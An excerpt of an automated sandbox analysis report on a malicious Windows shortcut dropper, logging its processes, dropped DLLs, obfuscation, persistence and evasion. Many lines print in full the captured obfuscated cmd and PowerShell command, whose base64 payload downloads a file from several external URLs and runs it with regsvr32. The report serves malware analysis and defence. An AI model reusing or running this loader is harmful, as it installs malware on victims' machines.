                    Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dll
                    Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dll
                    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\ZtMIjYx\IKdzfJtQpj.BCP 4F7092CD881FC00ED017787C704C3D1B221B5B13D9A34539732BFC1EDB8261C5
                    Source: Joe Sandbox ViewDropped File: C:\Windows\System32\PZgVlkJBEGfsjmei\fJMgQrGs.dll (copy) 4F7092CD881FC00ED017787C704C3D1B221B5B13D9A34539732BFC1EDB8261C5
                    Source: Details.lnkReversingLabs: Detection: 41%
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
                    Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /v:on /c M6+PYc1Ovpprw628Rl1zIwgCkVUha+nmywj5pKbvwUCOuX5GbnEfV3pSZPoT4QlmtbO4K6aL||p^o^w^e^r^s^h^e^l^l.e^x^e -c "&{$HXG=[System.Text.Encoding]::ASCII;$ghT='ICBXcml0ZS1Ib3N0ICJYaHFJVSI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL3d3dy5qc29uc2ludGwuY29tL1J4c0dnb1ZXejkvNEhGaTNaWll0bllndEVMZ0NIblovIiwiaHR0cDovL2NtZW50YXJ6LjV';$ufmV='2LnBsL3RoZW1lcy96YWxNa1RiLyIsImh0dHBzOi8vbmFraGFyaW5pdHdlYmhvc3RpbmcuY29tL0hTRFlLTjFYNUdMRi8iLCJodHRwOi8vbmNpYS5kb3Rob21lLmNvLmtyL3dwLWluY2x1ZGVzL2x1N0pialg4WEwxS2FELyIsImh0dHA6Ly9waWZmbC5jb20vcGlmZmwuY29tL2EvIiwiaHR0cDovL2RpZ2l0YWxraXRjaGVuLmpwL2ltYWdlcy9QVm4vIik7JHQ9Ilp0TUlqWXgiOyRkPSIkZW52OlRNUFwuLlwkdCI7bWtkaXIgLWZvcmNlICRkIHwgb3V0LW51bGw7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGRcSUtkemZKdFFwai5CQ1A7UmVnc3ZyMzIuZXhlICIkZFxJS2R6Zkp0UXBqLkJDUCI7YnJlYWt9IGNhdGNoIHsgfX0=';$AHI=[System.Convert]::FromBase64String($ghT+$ufmV);$TcqkRL=$HXG.GetString($AHI); iex ($TcqkRL)}
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -c "&{$HXG=[System.Text.Encoding]::ASCII;$ghT='ICBXcml0ZS1Ib3N0ICJYaHFJVSI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL3d3dy5qc29uc2ludGwuY29tL1J4c0dnb1ZXejkvNEhGaTNaWll0bllndEVMZ0NIblovIiwiaHR0cDovL2NtZW50YXJ6LjV';$ufmV='2LnBsL3RoZW1lcy96YWxNa1RiLyIsImh0dHBzOi8vbmFraGFyaW5pdHdlYmhvc3RpbmcuY29tL0hTRFlLTjFYNUdMRi8iLCJodHRwOi8vbmNpYS5kb3Rob21lLmNvLmtyL3dwLWluY2x1ZGVzL2x1N0pialg4WEwxS2FELyIsImh0dHA6Ly9waWZmbC5jb20vcGlmZmwuY29tL2EvIiwiaHR0cDovL2RpZ2l0YWxraXRjaGVuLmpwL2ltYWdlcy9QVm4vIik7JHQ9Ilp0TUlqWXgiOyRkPSIkZW52OlRNUFwuLlwkdCI7bWtkaXIgLWZvcmNlICRkIHwgb3V0LW51bGw7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGRcSUtkemZKdFFwai5CQ1A7UmVnc3ZyMzIuZXhlICIkZFxJS2R6Zkp0UXBqLkJDUCI7YnJlYWt9IGNhdGNoIHsgfX0=';$AHI=[System.Convert]::FromBase64String($ghT+$ufmV);$TcqkRL=$HXG.GetString($AHI); iex ($TcqkRL)}"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\regsvr32.exe "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\..\ZtMIjYx\IKdzfJtQpj.BCP
                    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\PZgVlkJBEGfsjmei\fJMgQrGs.dll"
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -c "&{$HXG=[System.Text.Encoding]::ASCII;$ghT='ICBXcml0ZS1Ib3N0ICJYaHFJVSI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL3d3dy5qc29uc2ludGwuY29tL1J4c0dnb1ZXejkvNEhGaTNaWll0bllndEVMZ0NIblovIiwiaHR0cDovL2NtZW50YXJ6LjV';$ufmV='2LnBsL3RoZW1lcy96YWxNa1RiLyIsImh0dHBzOi8vbmFraGFyaW5pdHdlYmhvc3RpbmcuY29tL0hTRFlLTjFYNUdMRi8iLCJodHRwOi8vbmNpYS5kb3Rob21lLmNvLmtyL3dwLWluY2x1ZGVzL2x1N0pialg4WEwxS2FELyIsImh0dHA6Ly9waWZmbC5jb20vcGlmZmwuY29tL2EvIiwiaHR0cDovL2RpZ2l0YWxraXRjaGVuLmpwL2ltYWdlcy9QVm4vIik7JHQ9Ilp0TUlqWXgiOyRkPSIkZW52OlRNUFwuLlwkdCI7bWtkaXIgLWZvcmNlICRkIHwgb3V0LW51bGw7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGRcSUtkemZKdFFwai5CQ1A7UmVnc3ZyMzIuZXhlICIkZFxJS2R6Zkp0UXBqLkJDUCI7YnJlYWt9IGNhdGNoIHsgfX0=';$AHI=[System.Convert]::FromBase64String($ghT+$ufmV);$TcqkRL=$HXG.GetString($AHI); iex ($TcqkRL)}"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\regsvr32.exe "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\..\ZtMIjYx\IKdzfJtQpj.BCP
                    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\PZgVlkJBEGfsjmei\fJMgQrGs.dll"
                    Source: C:\Windows\System32\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D105A4D4-344C-48EB-9866-EE378D90658B}\InProcServer32
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Documents\20220523Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_txiyar5n.dg2.ps1Jump to behavior
                    Source: classification engineClassification label: mal100.troj.evad.winLNK@14/8@2/4
                    Source: C:\Windows\System32\conhost.exeFile read: C:\Users\desktop.iniJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180006F2C FindCloseChangeNotification,Process32FirstW,CreateToolhelp32Snapshot,Process32NextW,
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

                    Data Obfuscation

                    barindex
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -c "&{$HXG=[System.Text.Encoding]::ASCII;$ghT='ICBXcml0ZS1Ib3N0ICJYaHFJVSI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL3d3dy5qc29uc2ludGwuY29tL1J4c0dnb1ZXejkvNEhGaTNaWll0bllndEVMZ0NIblovIiwiaHR0cDovL2NtZW50YXJ6LjV';$ufmV='2LnBsL3RoZW1lcy96YWxNa1RiLyIsImh0dHBzOi8vbmFraGFyaW5pdHdlYmhvc3RpbmcuY29tL0hTRFlLTjFYNUdMRi8iLCJodHRwOi8vbmNpYS5kb3Rob21lLmNvLmtyL3dwLWluY2x1ZGVzL2x1N0pialg4WEwxS2FELyIsImh0dHA6Ly9waWZmbC5jb20vcGlmZmwuY29tL2EvIiwiaHR0cDovL2RpZ2l0YWxraXRjaGVuLmpwL2ltYWdlcy9QVm4vIik7JHQ9Ilp0TUlqWXgiOyRkPSIkZW52OlRNUFwuLlwkdCI7bWtkaXIgLWZvcmNlICRkIHwgb3V0LW51bGw7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGRcSUtkemZKdFFwai5CQ1A7UmVnc3ZyMzIuZXhlICIkZFxJS2R6Zkp0UXBqLkJDUCI7YnJlYWt9IGNhdGNoIHsgfX0=';$AHI=[System.Convert]::FromBase64String($ghT+$ufmV);$TcqkRL=$HXG.GetString($AHI); iex ($TcqkRL)}"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -c "&{$HXG=[System.Text.Encoding]::ASCII;$ghT='ICBXcml0ZS1Ib3N0ICJYaHFJVSI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL3d3dy5qc29uc2ludGwuY29tL1J4c0dnb1ZXejkvNEhGaTNaWll0bllndEVMZ0NIblovIiwiaHR0cDovL2NtZW50YXJ6LjV';$ufmV='2LnBsL3RoZW1lcy96YWxNa1RiLyIsImh0dHBzOi8vbmFraGFyaW5pdHdlYmhvc3RpbmcuY29tL0hTRFlLTjFYNUdMRi8iLCJodHRwOi8vbmNpYS5kb3Rob21lLmNvLmtyL3dwLWluY2x1ZGVzL2x1N0pialg4WEwxS2FELyIsImh0dHA6Ly9waWZmbC5jb20vcGlmZmwuY29tL2EvIiwiaHR0cDovL2RpZ2l0YWxraXRjaGVuLmpwL2ltYWdlcy9QVm4vIik7JHQ9Ilp0TUlqWXgiOyRkPSIkZW52OlRNUFwuLlwkdCI7bWtkaXIgLWZvcmNlICRkIHwgb3V0LW51bGw7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGRcSUtkemZKdFFwai5CQ1A7UmVnc3ZyMzIuZXhlICIkZFxJS2R6Zkp0UXBqLkJDUCI7YnJlYWt9IGNhdGNoIHsgfX0=';$AHI=[System.Convert]::FromBase64String($ghT+$ufmV);$TcqkRL=$HXG.GetString($AHI); iex ($TcqkRL)}"
                    Source: unknownProcess created: C:\Windows\System32\cmd.exe" /v:on /c M6+PYc1Ovpprw628Rl1zIwgCkVUha+nmywj5pKbvwUCOuX5GbnEfV3pSZPoT4QlmtbO4K6aL||p^o^w^e^r^s^h^e^l^l.e^x^e -c "&{$HXG=[System.Text.Encoding]::ASCII;$ghT='ICBXcml0ZS1Ib3N0ICJYaHFJVSI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL3d3dy5qc29uc2ludGwuY29tL1J4c0dnb1ZXejkvNEhGaTNaWll0bllndEVMZ0NIblovIiwiaHR0cDovL2NtZW50YXJ6LjV';$ufmV='2LnBsL3RoZW1lcy96YWxNa1RiLyIsImh0dHBzOi8vbmFraGFyaW5pdHdlYmhvc3RpbmcuY29tL0hTRFlLTjFYNUdMRi8iLCJodHRwOi8vbmNpYS5kb3Rob21lLmNvLmtyL3dwLWluY2x1ZGVzL2x1N0pialg4WEwxS2FELyIsImh0dHA6Ly9waWZmbC5jb20vcGlmZmwuY29tL2EvIiwiaHR0cDovL2RpZ2l0YWxraXRjaGVuLmpwL2ltYWdlcy9QVm4vIik7JHQ9Ilp0TUlqWXgiOyRkPSIkZW52OlRNUFwuLlwkdCI7bWtkaXIgLWZvcmNlICRkIHwgb3V0LW51bGw7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGRcSUtkemZKdFFwai5CQ1A7UmVnc3ZyMzIuZXhlICIkZFxJS2R6Zkp0UXBqLkJDUCI7YnJlYWt9IGNhdGNoIHsgfX0=';$AHI=[System.Convert]::FromBase64String($ghT+$ufmV);$TcqkRL=$HXG.GetString($AHI); iex ($TcqkRL)}
                    Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /v:on /c M6+PYc1Ovpprw628Rl1zIwgCkVUha+nmywj5pKbvwUCOuX5GbnEfV3pSZPoT4QlmtbO4K6aL||p^o^w^e^r^s^h^e^l^l.e^x^e -c "&{$HXG=[System.Text.Encoding]::ASCII;$ghT='ICBXcml0ZS1Ib3N0ICJYaHFJVSI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL3d3dy5qc29uc2ludGwuY29tL1J4c0dnb1ZXejkvNEhGaTNaWll0bllndEVMZ0NIblovIiwiaHR0cDovL2NtZW50YXJ6LjV';$ufmV='2LnBsL3RoZW1lcy96YWxNa1RiLyIsImh0dHBzOi8vbmFraGFyaW5pdHdlYmhvc3RpbmcuY29tL0hTRFlLTjFYNUdMRi8iLCJodHRwOi8vbmNpYS5kb3Rob21lLmNvLmtyL3dwLWluY2x1ZGVzL2x1N0pialg4WEwxS2FELyIsImh0dHA6Ly9waWZmbC5jb20vcGlmZmwuY29tL2EvIiwiaHR0cDovL2RpZ2l0YWxraXRjaGVuLmpwL2ltYWdlcy9QVm4vIik7JHQ9Ilp0TUlqWXgiOyRkPSIkZW52OlRNUFwuLlwkdCI7bWtkaXIgLWZvcmNlICRkIHwgb3V0LW51bGw7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGRcSUtkemZKdFFwai5CQ1A7UmVnc3ZyMzIuZXhlICIkZFxJS2R6Zkp0UXBqLkJDUCI7YnJlYWt9IGNhdGNoIHsgfX0=';$AHI=[System.Convert]::FromBase64String($ghT+$ufmV);$TcqkRL=$HXG.GetString($AHI); iex ($TcqkRL)}
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000C892 push ebp; retf
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000D095 push B3B8007Eh; iretd
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000D0F3 push ebp; iretd
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180013551 push ebx; retf
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000D15D push ebx; retn 0068h
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000CDA8 push ebp; iretd
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000CE36 push 458B0086h; iretd
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180013551 push ebx; retf
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FFA51CB0CC0 LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,
                    Source: IKdzfJtQpj.BCP.2.drStatic PE information: real checksum: 0x654f5 should be: 0x60ea5
                    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\PZgVlkJBEGfsjmei\fJMgQrGs.dll"

                    Persistence and Installation Behavior

                    barindex
                    Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
                    Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ZtMIjYx\IKdzfJtQpj.BCPJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ZtMIjYx\IKdzfJtQpj.BCPJump to dropped file
                    Source: C:\Windows\System32\regsvr32.exeFile created: C:\Windows\System32\PZgVlkJBEGfsjmei\fJMgQrGs.dll (copy)Jump to dropped file
                    Source: C:\Windows\System32\regsvr32.exeFile created: C:\Windows\System32\PZgVlkJBEGfsjmei\fJMgQrGs.dll (copy)Jump to dropped file

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Source: C:\Windows\System32\regsvr32.exeFile opened: C:\Windows\system32\PZgVlkJBEGfsjmei\fJMgQrGs.dll:Zone.Identifier read attributes | delete
                    Source: C:\Windows\System32\regsvr32.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7036Thread sleep count: 7004 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7040Thread sleep count: 2321 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7096Thread sleep time: -16602069666338586s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7136Thread sleep time: -1844674407370954s >= -30000s
                    Source: C:\Windows\System32\svchost.exe TID: 5772Thread sleep time: -30000s >= -30000s
                    Source: C:\Windows\System32\svchost.exe TID: 5340Thread sleep time: -60000s >= -30000s
                    Source: C:\Windows\System32\regsvr32.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7004
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2321
                    Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                    Source: C:\Windows\System32\regsvr32.exeAPI coverage: 9.5 %
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800248B0 FindFirstFileW,FindNextFileW,FindClose,
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\regsvr32.exeAPI call chain: ExitProcess graph end node
                    Source: C:\Windows\System32\regsvr32.exeAPI call chain: ExitProcess graph end node
                    Source: C:\Windows\System32\regsvr32.exeFile Volume queried: C:\ FullSizeInformation
